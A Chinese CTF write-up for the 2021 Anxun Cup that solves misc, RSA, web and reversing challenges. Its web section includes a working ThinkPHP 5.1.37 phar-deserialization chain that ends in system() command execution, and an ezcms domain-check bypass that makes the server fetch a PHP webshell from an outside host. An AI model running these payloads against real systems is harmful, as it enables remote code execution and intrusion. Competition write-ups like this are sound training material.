第四届“安洵杯”网络安全挑战赛Writeup
2021-11-28 13:28:00

Misc

应该算是签到

在这里插入图片描述
B站搜索直接搜索这个BV号
在这里插入图片描述
PS:出题人品味不错,我也喜欢酷玩的这首《Yellow》

直接页面Ctrl+F没找出来
搜索引擎找一下有没有通过API查弹幕的方法:https://www.bilibili.com/read/cv7923601

在这里插入图片描述
F12点击Network,找到这个视频的cid
在这里插入图片描述
从当前时间2021-11-27开始往前找

1
https://api.bilibili.com/x/v2/dm/web/history/seg.so?type=1&oid=400438565&date=2021-11-27

将历史弹幕文件下载下来,选择UTF-8编码,然后查找关键字即可
在这里插入图片描述

1
D0g3{We1come_to_axbg0g0g0}

CyzCC_loves_LOL

在这里插入图片描述
D0g3_LOLteampassword

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
HAI D0g3 code
I HAS A CODE ITZ "D0g3isthepAssword"
I HAS A MSG ITZ ""
I HAS A COUNTER ITZ 0
I HAS A NUM
IM IN YR LOOP UPPIN YR COUNTER WILE COUNTER SMALLR THAN LEN OF CODE
I HAS A C ITZ CODE!COUNTER
NUM R ORD OF C
NUM R SUM OF NUM AN -3
IZ NUM SMALLR THAN 65?, NUM R SUM OF NUM AN 26, KTHX
NUM R CHR OF NUM
MSG R SMOOSH MSG AN NUM
IM OUTTA YR LOOP
VISIBLE MSG
KTHXBYE

看不懂什么东西,猜测某种编码,搜索引擎找一下
在这里插入图片描述

解码得到ez_misc.zip密码:AGdJfpqebmXpptloa
在这里插入图片描述

在这里插入图片描述
Program.png根据名称提示一开始以为是npiet,尝试直接编译发现不对
在这里插入图片描述
后来经过查阅资料才发现Brainfuck也有一种用像素颜色表示的语言:Brainloller

上传之后点击Play,得到密码:0MTTW CWZVN!
在这里插入图片描述
然后根据题目名称提示将密码中的空格换成下划线、以及jinx's_flag_in_silent.jpg的名称,直接尝试SilentEye解密
在这里插入图片描述

1
D0g3{544f3225-bbaf-47dc-ba8d-5bda54cbaecb}

Cthulhu Mythos

下载附件,发现是里面是一个hint.mp3The Evil Watcher.wld

1638064889766.png

hint.mp3听一下,发现前面是泰拉瑞亚的主题曲,后面部分很明显是SSTV

在这里插入图片描述

因为格式问题没法直接用QSSTVRX-SSTV的话又比较麻烦要调整电脑录音设备,就直接用Robot36听吧

网上随便找个地址:https://apkpure.com/cn/robot36-sstv-image-decoder/xdsopl.robot36

在这里插入图片描述

1638066200197.png

得到后半部分的flag:d_Try_Terr4ria!}

The Evil Watcher.wld文件是Terraria游戏的一个地图文件,我们可以通过Terramap地图查看器去加载这个地图文件

Terramap链接:https://www.bilibili.com/read/cv8778447/

等加载完地图,Players:选择All Spoiers,这样地图就全部显现出来了,可以通过左键拖动地图,右键可以查看相关物品信息

1638065164008.png

在地图中发现了四个蓝色突起状的东西,右键点击发现了类似base编码的东西

1638065561205.png

1638064689315.png

1638065626983.png

第四个箱子说密文被机械师拿走了

1638065706429.png

讲前三个箱子的base编码组合一下,得到base32编码

1
IQYGOM33JUYW4ZLDKI2GM5C

CyberChef解码一下得到前半部分的D0g3{M1necR4ft,但是跟后半部分是连不上的,我们再去看看第四个箱子里面被拿走的密文是什么

1638065902348.png

最后一个箱子的密文始终没有找到,在尝试了多个编辑器后,终于使用Tedit在出生地发现了最后的密文,不知道为啥有的编辑器不显示,有的编辑器又会显示。。。

Tedit下载地址:https://www.binaryconstruct.com/downloads/

1638066532923.png

得到7I4YF6QLO,所以完整的前半部分的base32编码就是IQYGOM33JUYW4ZLDKI2GM5C7I4YF6QLO

1638066719523.png

得到D0g3{M1necR4ft_G0_An,所以结合前面的后半部分flag:d_Try_Terr4ria!}

所以flag为:

1
D0g3{M1necR4ft_G0_And_Try_Terr4ria!}

lovemath

打开压缩包,里面除了flag.zip,还有几个 大小只有6的txt文件,这里应该是要crc32爆破了

1638020484086.png

使用命令:

1
python crc32.py reverse 0xCRC32的值

分别得到:

1638020857885.png

1638020906039.png

1638020956484.png

1638021008620.png

1638021073161.png

连起来就是:th1s_Is_Y0ur_pa33w0rd_We1c0m3e

打开flag.zip得到

1638021141040.png

1638021206995.png

用Stegsolve打开图片,发现R,G,B的0通道都有异常

1638021293911.png

应该是LSB隐写没跑了

1638021343913.png

我们将其Save Bin,保存为png图片,发现打不开,用010打开发现文件头前面有多余的字节,删掉后可打开得到一张带有很多数字的图片

1638021438762.png

因为没法复制,手撸的话估计眼睛要瞎了,尝试用QQ识图来获取数据,但是全部选中识别又有误差,于是选了个折中的办法就是半行半行的用QQ识图。。。总算是识别完了,遭不住,眼睛痛

1
1251077695482776025338577125579215707216262981842821000162276994967943212822693842845266851984880336702446444408289977864567921038435144120176357529686342977212633764247620567669441602729004003473312468776582473461071462631554533766709934484393185739708817165738912742570170547790145328253304755428563911689057632001795598667127514331122190795355921436735375126688142856470280128821316586008242687241930886868804388482643589009068543771977163419519208340324352

尝试过转字符,但是失败了哈哈哈哈,果然作为500分的题肯定没这么简单,根据题目,lovemath数学如此美丽,甚至能画出自己来看,这题应该是要通过某种数学方式来绘图,并且注意这句甚至能画出自己,最后百度了很久,终于在百度自我画图公式的结果中,发现了塔伯自我指涉公式作图程序(matplotlib),里面还附有脚本

脚本地址:https://www.cnblogs.com/1024th/p/14418846.html

1638022624948.png

脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
"""
Plot Tupper's self-referential formula
"""
import textwrap
import matplotlib.pyplot as plt

K = 1251077695482776025338577125579215707216262981842821000162276994967943212822693842845266851984880336702446444408289977864567921038435144120176357529686342977212633764247620567669441602729004003473312468776582473461071462631554533766709934484393185739708817165738912742570170547790145328253304755428563911689057632001795598667127514331122190795355921436735375126688142856470280128821316586008242687241930886868804388482643589009068543771977163419519208340324352


H = 17
W = 106

if __name__ == "__main__":
plt.figure(figsize=(6.8, 4), dpi=600)
plt.axis("scaled")

K_ = K//17
for x in range(W):
for y in range(H):
if K_ & 1:
plt.bar(x+0.5, bottom=y, height=1,
width=1, linewidth=0, color="black")
K_ >>= 1

plt.figtext(0.5, 0.8, r"$\frac{1}{2}<\left\lfloor \operatorname{mod}\left(\left\lfloor\frac{y}{%d}\right\rfloor 2^{-%d\lfloor x\rfloor-\operatorname{mod}(\lfloor y\rfloor, %d)}, 2\right)\right\rfloor$" % (H, H, H), ha="center", va="bottom", fontsize=18)
plt.subplots_adjust(top=0.8, bottom=0.5)
K_str = textwrap.wrap(str(K), 68)
K_str[0] = f"K={K_str[0]}"
for i in range(1, len(K_str)):
K_str[i] = f" {K_str[i]}".ljust(70)
K_str = "\n".join(K_str)
plt.figtext(0.5, 0.45, K_str, fontfamily="monospace", ha="center", va="top")

plt.xlim((0, W))
plt.ylim((0, H))
xticks = list(range(0, W+1))
xlabels = ["" for i in xticks]
xlabels[0] = "0"
xlabels[-1] = str(W)
plt.xticks(xticks, xlabels)
yticks = list(range(0, H+1))
ylabels = ["" for i in yticks]
ylabels[0] = "K"
ylabels[-1] = f"K+{H}"
plt.yticks(yticks, ylabels)
plt.grid(b=True, linewidth=0.5)

# plt.show()
plt.savefig("Tupper-plot.png")
# plt.savefig(fname="name", format="svg")

把之前得到的数据填入K之后运行,得到Tupper-plot.png

1638022822602.png

得到flag为:

1
D0g3{I_Lov3_math}

Cry

little_trick

注意到e的生成:
$$
e = gmpy2.next-prime(bytes-to-long(os.urandom(3)))
$$
由此可知e的取值较小,可以爆破出来,大致估计e的范围:e<256 * 256 * 150+256 * 150 +150=9868950,于是设置e的上界为e<10000000.

直接爆破e时间可能太久,我们采取空间换时间的方法:先把这个范围内的素数全求出来,存在一个列表里面,然后对列表索引爆破,判断依据为b’D0g3’。

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
import sympy
from gmpy2 import *
from Crypto.Util.number import *
p=119494148343917708105807117614773529196380452025859574123211538859983094108015678321724495609785332508563534950957367289723559468197440246960403054020452985281797756117166991826626612422135797192886041925043855329391156291955066822268279533978514896151007690729926904044407542983781817530576308669792533266431
q=125132685086281666800573404868585424815247082213724647473226016452471461555742194042617318063670311290694310562746442372293133509175379170933514423842462487594186286854028887049828613566072663640036114898823281310177406827049478153958964127866484011400391821374773362883518683538899757137598483532099590137741
c=10238271315477488225331712641083290024488811710093033734535910573493409567056934528110845049143193836706122210303055466145819256893293429223389828252657426030118534127684265261192503406287408932832340938343447997791634435068366383965928991637536875223511277583685579314781547648602666391656306703321971680803977982711407979248979910513665732355859523500729534069909408292024381225192240385351325999798206366949106362537376452662264512012770586451783712626665065161704126536742755054830427864982782030834837388544811172279496657776884209756069056812750476669508640817369423238496930357725842768918791347095504283368032
e=2
phi=(p-1)*(q-1)
n=p*q
l=[2]
while e<10000000:
e=sympy.nextprime(e)
l.append(e)
for e in l:
if gcd(e,phi)!=1:
continue
d=invert(e,phi)
m=long_to_bytes(pow(c,d,n))
if b'D0g3' in m:
print(m)
break


运行大概十几二十分钟可得结果。

flag为:

1
D0g3{Welc0me_t0_iSOON_4nd_have_4_go0d_time}

ez_equation

设primelist中的三个素数分别为p1,p2,p3,则有M1=y1+x2+x3=$p_2(p_1+1)(p_1+p_2)$,M2=y2+y3=$p_2(p_3+1)(p_1+p_2)-2$,于是M3=M2+2=$p_2(p_3+1)(p_1+p_2)$,对M1和M3求gcd可得$p_2*(p_1+p_2)*gcd(p_1+1,p_3+1)$,我们在1000的范围内爆破$gcd(p_1+1,p_3+1)$,即可求得p1,p2,p3,后面由于p,q很近,枚举p-q分解n,正常解密即可。

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
import sympy
from gmpy2 import *
from Crypto.Util.number import *
def solve(a,b,c):
delta=b*b-4*a*c
if delta<0:
return (0,0)
delta=isqrt(delta)
if (-b+delta)%(2*a)!=0 or (-b-delta)%(2*a)!=0:
return (0,0)
return ((-b+delta)//(2*a),(-b-delta)//(2*a))

M1=3826382835023788442651551584905620963555468828948525089808250303867245240492543151274589993810948153358311949129889992078565218014437985797623260774173862776314394305207460929010448541919151371739763413408901958357439883687812941802749556269540959238015960789123081724913563415951118911225765239358145144847672813272304000303248185912184454183649550881987218183213383170287341491817813853157303415010621029153827654424674781799037821018845093480149146846916972070471616774326658992874624717335369963316741346596692937873980736392272357429717437248731018333011776098084532729315221881922688633390593220647682367272566275381196597702434911557385351389179790132595840157110385379375472525985874178185477024824406364732573663044243615168471526446290952781887679180315888377262181547383953231277148364854782145192348432075591465309521454441382119502677245090726728912738123512316475762664749771002090738886940569852252159994522316

M2=4046011043117694641224946060698160981194371746049558443191995592417947642909277226440465640195903524402898673255622570650810338780358645872293473212692240675287998097280715739093285167811740252792986119669348108850168574423371861266994630851360381835920384979279568937740516573412510564312439718402689547377548575653450519989914218115265842158616123026997554651983837361028152010675551489190669776458201696937427188572741833635865019931327548900804323792893273443467251902886636756173665823644958563664967475910962085867559357008073496875191391847757991101189003154422578662820049387899402383235828011830444034463049749668906583814229827321704450021715601349950406035896249429068630164092309047645766216852109121662629835574752784717997655595307873219503797996696389945782836994848995124776375146245061787647756704605043856735398002012276311781956668212776588970619658063515356931386886871554860891089498456646036630114620806

#t=gcd(M1,M2+2),m1=M1//t,m2=(M2+2)//t

t=195589523630445818529902860956832796890855251392633128505267360019379766078441039447714629517705654989596005641784168486211312686680455807626431626165080866039191378864985968731741426496463223663496416166582452161079104234385985738660388414139911168334469051423205629829765572078313431736483728155228814915764228990643229252394940446647628166159386129345355060753013764486772721947063419319730756920046220488674399534007795610790140941688361870003545561101950379051252306239620980393842817770270164660348572241648029661122045865707023959462688020516797465334280134572790507613563583907925334439091301297527252508403124
m1=19563332248068151535630981329078704836011877594400641639369459141215900260861025312054906757599794566083208720855569882795966368648050841796097774666530924861861072322505359934227960441733030841677273935286749895660385076617500078541482883261409708629757597729348593181573750624736984373186183627343721574559
m2=20686235990647329610791853921718735187994958766092474204131359561885208246097905843101029093347765900355157072072179547621235081101156100572779845352580259426625670629461859798011004868747162865241652060762059495558269934939075323522904748472063800026320062177474213759817229716245635847559587261121068310442
for i in range(2,1000,2):
t1=i*m1-1
t2=i*m2-1
if sympy.isprime(t1):
break

#gcd=6,t1=117379993488408909213785887974472229016071265566403849836216754847295401565166151872329440545598767396499252325133419296775798211888305050776586647999185549171166433935032159605367762650398185050063643611720499373962310459705000471248897299568458251778545586376091559089442503748421906239117101764062329447353,t2=124117415943883977664751123530312411127969752596554845224788157371311249476587435058606174560086595402130942432433077285727410486606936603436679072115481556559754023776771158788066029212482977191449912364572356973349619609634451941137428490832382800157920373064845282558903378297473815085357523566726409862651
c=1394946766416873131554934453357121730676319808212515786127918041980606746238793432614766163520054818740952818682474896886923871330780883504028665380422608364542618561981233050210507202948882989763960702612116316321009210541932155301216511791505114282546592978453573529725958321827768703566503841883490535620591951871638499011781864202874525798224508022092610499899166738864346749753379399602574550324310119667774229645827773608873832795828636770263111832990012205276425559363977526114225540962861740929659841165039419904164961095126757294762709194552018890937638480126740196955840656602020193044969685334441405413154601311657668298101837066325231888411018908300828382192203062405287670490877283269761047853117971492197659115995537837080400730294215778540754482680476723953659085854297184575548489544772248049479632420289954409052781880871933713121875562554234841599323223793407272634167421053493995795570508435905280269774274084603687516219837730100396191746101622725880529896250904142333391598426588238082485305372659584052445556638990497626342509620305749829144158797491411816819447836265318302080212452925144191536031249404138978886262136129250971366841779218675482632242265233134997115987510292911606736878578493796260507458773824689843424248233282828057027197528977864826149756573867022173521177021297886987799897923182290515542397534652789013340264587028424629766689059507844211910072808286250914059983957934670979551428204569782238857331272372035625901349763799005621577332502957693517473861726359829588419409120076625939502382579605
n=19445950132976386911852381666731799463510958712950274248183192405937223343228119407660772413067599252710235310402278345391806863116119010697766434743302798644091220730819441599784039955347398797545219314925103529062092963912855489464914723588833817280786158985269401131919618320866942737291915603551320163001129725430205164159721810319128999027215168063922977994735609079166656264150778896809813972275824980250733628895449444386265971986881443278517689428198251426557591256226431727934365277683559038777220498839443423272238231659356498088824520980466482528835994554892785108805290209163646408594682458644235664198690503128767557430026565606308422630014285982847395405342842694189025641950775231191537369161140012412147734635114986068452144499789367187760595537610501700993916441274609074477086105160306134590864545056872161818418667370690945602050639825453927168529154141097668382830717867158189131567590506561475774252148991615602388725559184925467487450078068863876285937273896246520621965096127440332607637290032226601266371916124456122172418136550577512664185685633131801385265781677598863031205194151992390159339130895897510277714768645984660240750580001372772665297920679701044966607241859495087319998825474727920273063120701389749480852403561022063673222963354420556267045325208933815212625081478538158049144348626000996650436898760300563194390820694376019146835381357141426987786643471325943646758131021529659151319632425988111406974492951170237774415667909612730440407365124264956213064305556185423432341935847320496716090528514947
e=65537
p1=t1
p3=t2
term=t//6
p2,P2=solve(1,p1,-term)
pq=n//(p1*p2*p3)
k=2
while 1:
cha=k
he=(pq+cha*cha//4)*4
if iroot(he,2)[1]==True:
he=iroot(he,2)[0]
break
k+=2
p,q=solve(1,-he,pq)
phi=(p-1)*(q-1)*(p1-1)*(p2-1)*(p3-1)
d=invert(e,phi)
m=long_to_bytes(pow(c,d,n))
print(m[256:256+42])

flag:为

1
D0g3{296b680c-7aeb-5272-8b33-7335b411fbcb}

strange

注意到m是flag,相对于hint和n来说都比较小,m|hint的操作对于hint来说影响很小,这就存在一个小值根,因此采用coppersmith的方法先解出m1,然后根据m1和m2先预估出m的位数,再爆破m的每一位来得到flag。

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
##sagemath
n=13002904520196087913175026378157676218772224961198751789793139372975952998874109513709715017379230449514880674554473551508221946249854541352973100832075633211148140972925579736088058214014993082226530875284219933922497736077346225464349174819075866774069797318066487496627589111652333814065053663974480486379799102403118744672956634588445292675676671957278976483815342400168310432107890845293789670795394151784569722676109573685451673961309951157399183944789163591809561790491021872748674809148737825709985578568373545210653290368264452963080533949168735319775945818152681754882108865201849467932032981615400210529003
c=8560367979088389639093355670052955344968008917787780010833158290316540154791612927595480968370338549837249823871244436946889198677945456273317343886485741297260557172704718731809632734567349815338988169177983222118718585249696953103962537942023413748690596354436063345873831550109098151014332237310265412976776977183110431262893144552042116871747127301026195142320678244525719655551498368460837394436842924713450715998795899172774573341189660227254331656916960984157772527015479797004423165812493802730996272276613362505737536007284308929288293814697988968407777480072409184261544708820877153825470988634588666018802
h=9989639419782222444529129951526723618831672627603783728728767345257941311870269471651907118545783408295856954214259681421943807855554571179619485975143945972545328763519931371552573980829950864711586524281634114102102055299443001677757487698347910133933036008103313525651192020921231290560979831996376634906893793239834172305304964022881699764957699708192080739949462316844091240219351646138447816969994625883377800662643645172691649337353080140418336425506119542396319376821324619330083174008060351210307698279022584862990749963452589922185709026197210591472680780996507882639014068600165049839680108974873361895144
Zmod=Zmod(n)
P.<x>=PolynomialRing(Zmod)
f=(h+x)^3-c
x0=f.small_roots(X=2^400,beta=0.5)
print(x0)
m1=x0+h
print(m1)
##python
from Crypto.Util.number import *
h=9989639419782222444529129951526723618831672627603783728728767345257941311870269471651907118545783408295856954214259681421943807855554571179619485975143945972545328763519931371552573980829950864711586524281634114102102055299443001677757487698347910133933036008103313525651192020921231290560979831996376634906893793239834172305304964022881699764957699708192080739949462316844091240219351646138447816969994625883377800662643645172691649337353080140418336425506119542396319376821324619330083174008060351210307698279022584862990749963452589922185709026197210591472680780996507882639014068600165049839680108974873361895144
m1=9989639419782222444529129951526723618831672627603783728728767345257941311870269471651907118545783408295856954214259681421943807855554571179619485975143945972545328763519931371552573980829950864711586524281634114102102055299443001677757487698347910133933036008103313525651192020921231290560979831996376634906893793239834172305304964022881699764957699708192080739949462316844091240219351646138447816969994625883377800662643645172691649337353080140418336425506119542396319376821324619330083174008060351210933049560781360717427446713646109570038056138652803756149233612618692820860571507613112565167824369560313209417725
m2=9869907877594701353175281930839281485694004896356038595955883788511764488228640164047958227861871572990960024485992
m=''
m1=bin(m1)[2:]
m1=m1[::-1]
h=bin(h)[2:]
h=h[::-1]
m2=bin(m2)[2:]
m2=m2[::-1]
m2+='00000'
bit=[0,1]
for i in range(383):
for j in bit:
if j|int(h[i])==int(m1[i]) and j&int(h[i])==int(m2[i]):
m+=str(j)
print(m[::-1])
print(int(m[::-1],2))
print(long_to_bytes(int(m[::-1],2)))

flag为:

1
D0g3{R54_f4l1_1n_l0ve_with_CopperSmith_w0wow0!!}

Web

ez_tp

扫到www.zip,下载到源码。版本5.1.37,diff了一下发现没有什么不同,直接看源码

1638030400750.png

能读任意文件,但找不到flag位置,不过很明显看出phar反序列化

找链子生成phar文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
<?php
namespace think\process\pipes{

use think\model\Pivot;

class Windows
{
private $files = [];
public function __construct(){
$this->files[]=new Pivot();
}
}
}
namespace think{
abstract class Model
{
protected $append = [];
private $data = [];
public function __construct(){
$this->data=array(
'feng'=>new Request()
);
$this->append=array(
'feng'=>array(
'hello'=>'world'
)
);
}
}
}
namespace think\model{

use think\Model;

class Pivot extends Model
{

}
}
namespace think{
class Request
{
protected $hook = [];
protected $filter;
protected $config = [
// 表单请求类型伪装变量
'var_method' => '_method',
// 表单ajax伪装变量
'var_ajax' => '',
// 表单pjax伪装变量
'var_pjax' => '_pjax',
// PATHINFO变量名 用于兼容模式
'var_pathinfo' => 's',
// 兼容PATH_INFO获取
'pathinfo_fetch' => ['ORIG_PATH_INFO', 'REDIRECT_PATH_INFO', 'REDIRECT_URL'],
// 默认全局过滤方法 用逗号分隔多个
'default_filter' => '',
// 域名根,如thinkphp.cn
'url_domain_root' => '',
// HTTPS代理标识
'https_agent_name' => '',
// IP代理获取标识
'http_agent_ip' => 'HTTP_X_REAL_IP',
// URL伪静态后缀
'url_html_suffix' => 'html',
];
public function __construct(){
$this->hook['visible']=[$this,'isAjax'];
$this->filter="system";
}
}
}
namespace{
use think\process\pipes\Windows;
$phar = new Phar("phar3.phar"); //后缀名必须为phar,压缩后的文件名
$phar->startBuffering();
$phar->setStub(" __HALT_COMPILER(); ?>"); //设置stub
$o = new Windows();
$phar->setMetadata($o); //将自定义的meta-data存入manifest
$phar->addFromString("hello.txt", "test"); //test为内容test.txt为要压缩的文件(可以不存在)
//签名自动计算
$phar->stopBuffering();
// echo base64_encode(serialize(new Windows));
}

读phar

1
2
<?php
echo base64_encode(file_get_contents("phar3.phar"));

payload变量覆盖一下

http://1.12.220.15:19274/index.php/index/index/hello?shell=cat /*

1
world=hello=IF9fSEFMVF9DT01QSUxFUigpOyA/Pg0KJgMAAAEAAAARAAAAAQAAAAAA7wIAAE86Mjc6InRoaW5rXHByb2Nlc3NccGlwZXNcV2luZG93cyI6MTp7czozNDoiAHRoaW5rXHByb2Nlc3NccGlwZXNcV2luZG93cwBmaWxlcyI7YToxOntpOjA7TzoxNzoidGhpbmtcbW9kZWxcUGl2b3QiOjI6e3M6OToiACoAYXBwZW5kIjthOjE6e3M6NDoiZmVuZyI7YToxOntzOjU6ImhlbGxvIjtzOjU6IndvcmxkIjt9fXM6MTc6IgB0aGlua1xNb2RlbABkYXRhIjthOjE6e3M6NDoiZmVuZyI7TzoxMzoidGhpbmtcUmVxdWVzdCI6Mzp7czo3OiIAKgBob29rIjthOjE6e3M6NzoidmlzaWJsZSI7YToyOntpOjA7cjo4O2k6MTtzOjY6ImlzQWpheCI7fX1zOjk6IgAqAGZpbHRlciI7czo2OiJzeXN0ZW0iO3M6OToiACoAY29uZmlnIjthOjEwOntzOjEwOiJ2YXJfbWV0aG9kIjtzOjc6Il9tZXRob2QiO3M6ODoidmFyX2FqYXgiO3M6MDoiIjtzOjg6InZhcl9wamF4IjtzOjU6Il9wamF4IjtzOjEyOiJ2YXJfcGF0aGluZm8iO3M6MToicyI7czoxNDoicGF0aGluZm9fZmV0Y2giO2E6Mzp7aTowO3M6MTQ6Ik9SSUdfUEFUSF9JTkZPIjtpOjE7czoxODoiUkVESVJFQ1RfUEFUSF9JTkZPIjtpOjI7czoxMjoiUkVESVJFQ1RfVVJMIjt9czoxNDoiZGVmYXVsdF9maWx0ZXIiO3M6MDoiIjtzOjE1OiJ1cmxfZG9tYWluX3Jvb3QiO3M6MDoiIjtzOjE2OiJodHRwc19hZ2VudF9uYW1lIjtzOjA6IiI7czoxMzoiaHR0cF9hZ2VudF9pcCI7czoxNDoiSFRUUF9YX1JFQUxfSVAiO3M6MTU6InVybF9odG1sX3N1ZmZpeCI7czo0OiJodG1sIjt9fX19fX0JAAAAaGVsbG8udHh0BAAAAAJnomEEAAAADH5/2LYBAAAAAAAAdGVzdM/lB06QxBmPdCdWlMiCHMEIvsfXAgAAAEdCTUI=%26a=phar://hello.txt

1638033323892.png

ezcms

审到很多前台sql注入,只能时间盲注,总是注到一半环境就崩,崩了之后重开又打不通了。

之后本地测试之后是可以未授权的,所以直接找后台功能,看到一个curl接口。

1638033469959.png

应该是可以远程下载文件的。

前面有

1
2
3
4
5
6
7
8
9
if (isset($_GET['url'])){
$dname=explode("/", $_GET['url']);
// print_r($dname);
if(strpos($dname[2],'sem-cms.cn') !== false){
$url=$_GET['url'];
}else{
echo("<script language='javascript'>alert('非法操作');window.history.back(-1);</script>");
exit;
}

用/分隔,dname[2]得包含sem-cms.cn,设置php文件名为此即可。

payload

1
http://81.69.27.32:8888/CxWsbN_AR4/Ant_Curl.php?url=47.101.176.40/shell/sem-cms.cn.php

提示下载失败,但本地测试之后其实是成功的,蚁剑连接

Soft/Zip/sem-cms.cn.php

1638034228982.png

RE

virtus

是傀儡进程,先dump出来真正的程序

1638068970432.png

题目要求输入两个内容,一个是key,一个是flag,key的长度是4,flag长度是32

1638068996240.png

使用线程对flag进行加密,算法很简单,就是异或

1638069036218.png

1638069044141.png

1638069057093.png

这里是对key进行运算,再用运算后的结果进行比较

1638069104168.png

Key的加密算法我没看懂,但是Key长度并不长,直接写个脚本爆破,爆破出来key是:_shy

1638069129230.png

剩下的部分就是根据key生成密钥表,然后对flag进行加密,最后进行比较

1638069156783.png

加密算法如下,推出:v3[i ] = sub_401005(*(a2 + 4 * i + 16) ^ v3[i + 3] ^ v3[i + 2] ^ v3[i + 1]) ^ v3[i+4]

1638082038924.png

剩下的就是把4011E0的加密算法抄下来,然后套上面推出来的公式,就能跑出flag

脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
#include "stdafx.h"
int key[]={
0xcbd6c588, 0x03f17d27, 0x1c18e9cc, 0xfe024db3, 0xd71737eb, 0x7b9b1eab, 0x2776bba4, 0xbd2018c0, 0x356d0553, 0x0c825513, 0xcaaff094, 0x9dfbcba1, 0x7eb6b878, 0x47630f35, 0x4b494bbe, 0x34fd620a,
0x14cf85ef, 0xd754e93a, 0x338b4918, 0xc0846091, 0xd526f236, 0xb9ce1fc7, 0xcb537b6a, 0x25fdd8ea, 0x7221094b, 0xa1f73abf, 0x2473d8cc, 0x8fa4f2f2, 0x1e7cac59, 0xec581806, 0x425d33c3, 0xbeb16ed4,
0xe5c0ca70, 0x02b60624, 0x3011744f, 0xf73a6e51, 0x4e7f6768, 0x774e5b55, 0x5b78657b, 0x6f6f724c, 0xcccccc00, 0x7968735f, 0xcccccc00, 0x0018ff88, 0x00402579, 0x00000001, 0x008e1228, 0x008e1290};
char map[352]={
0xd6, 0x90, 0xe9, 0xfe, 0xcc, 0xe1, 0x3d, 0xb7, 0x16, 0xb6, 0x14, 0xc2, 0x28, 0xfb, 0x2c, 0x05,
0x2b, 0x67, 0x9a, 0x76, 0x2a, 0xbe, 0x04, 0xc3, 0xaa, 0x44, 0x13, 0x26, 0x49, 0x86, 0x06, 0x99,
0x9c, 0x42, 0x50, 0xf4, 0x91, 0xef, 0x98, 0x7a, 0x33, 0x54, 0x0b, 0x43, 0xed, 0xcf, 0xac, 0x62,
0xe4, 0xb3, 0x1c, 0xa9, 0xc9, 0x08, 0xe8, 0x95, 0x80, 0xdf, 0x94, 0xfa, 0x75, 0x8f, 0x3f, 0xa6,
0x47, 0x07, 0xa7, 0xfc, 0xf3, 0x73, 0x17, 0xba, 0x83, 0x59, 0x3c, 0x19, 0xe6, 0x85, 0x4f, 0xa8,
0x68, 0x6b, 0x81, 0xb2, 0x71, 0x64, 0xda, 0x8b, 0xf8, 0xeb, 0x0f, 0x4b, 0x70, 0x56, 0x9d, 0x35,
0x1e, 0x24, 0x0e, 0x5e, 0x63, 0x58, 0xd1, 0xa2, 0x25, 0x22, 0x7c, 0x3b, 0x01, 0x21, 0x78, 0x87,
0xd4, 0x00, 0x46, 0x57, 0x9f, 0xd3, 0x27, 0x52, 0x4c, 0x36, 0x02, 0xe7, 0xa0, 0xc4, 0xc8, 0x9e,
0xea, 0xbf, 0x8a, 0xd2, 0x40, 0xc7, 0x38, 0xb5, 0xa3, 0xf7, 0xf2, 0xce, 0xf9, 0x61, 0x15, 0xa1,
0xe0, 0xae, 0x5d, 0xa4, 0x9b, 0x34, 0x1a, 0x55, 0xad, 0x93, 0x32, 0x30, 0xf5, 0x8c, 0xb1, 0xe3,
0x1d, 0xf6, 0xe2, 0x2e, 0x82, 0x66, 0xca, 0x60, 0xc0, 0x29, 0x23, 0xab, 0x0d, 0x53, 0x4e, 0x6f,
0xd5, 0xdb, 0x37, 0x45, 0xde, 0xfd, 0x8e, 0x2f, 0x03, 0xff, 0x6a, 0x72, 0x6d, 0x6c, 0x5b, 0x51,
0x8d, 0x1b, 0xaf, 0x92, 0xbb, 0xdd, 0xbc, 0x7f, 0x11, 0xd9, 0x5c, 0x41, 0x1f, 0x10, 0x5a, 0xd8,
0x0a, 0xc1, 0x31, 0x88, 0xa5, 0xcd, 0x7b, 0xbd, 0x2d, 0x74, 0xd0, 0x12, 0xb8, 0xe5, 0xb4, 0xb0,
0x89, 0x69, 0x97, 0x4a, 0x0c, 0x96, 0x77, 0x7e, 0x65, 0xb9, 0xf1, 0x09, 0xc5, 0x6e, 0xc6, 0x84,
0x18, 0xf0, 0x7d, 0xec, 0x3a, 0xdc, 0x4d, 0x20, 0x79, 0xee, 0x5f, 0x3e, 0xd7, 0xcb, 0x39, 0x48};
unsigned int AROL(unsigned i,unsigned bit){
_asm{
mov eax,[ebp+8];
push ecx;
mov ecx,[ebp+0xC];
rol eax,cl;
pop ecx;
leave;
retn;
}
return -1;
}
int __cdecl Rcopy(unsigned int a1, char * a2)
{
int result; // eax
int i; // [esp+4Ch] [ebp-4h]

for ( i = 0; i < 4; ++i )
{
a2[i] = a1 >> (24 - 8 * i);
result = i + 1;
}
return result;
}
void __cdecl rev(int a1, char *a2){
a2[0]=(a1&0xFF000000)>>24;
a2[1]=(a1&0xFF0000)>>16;
a2[2]=(a1&0xFF00)>>8;
a2[3]=a1&0xFF;
}
unsigned int EP(unsigned int a1){
int v6=0;
Rcopy(a1,(char*)&v6);
for(int i=0;i<4;++i){
unsigned int p=*((unsigned char*)&v6+i);
*((char*)&v6+i)=map[p];
}
rev(v6,(char*)&a1);
return a1^AROL(a1,2)^AROL(a1,10)^AROL(a1,18)^AROL(a1,24);

}
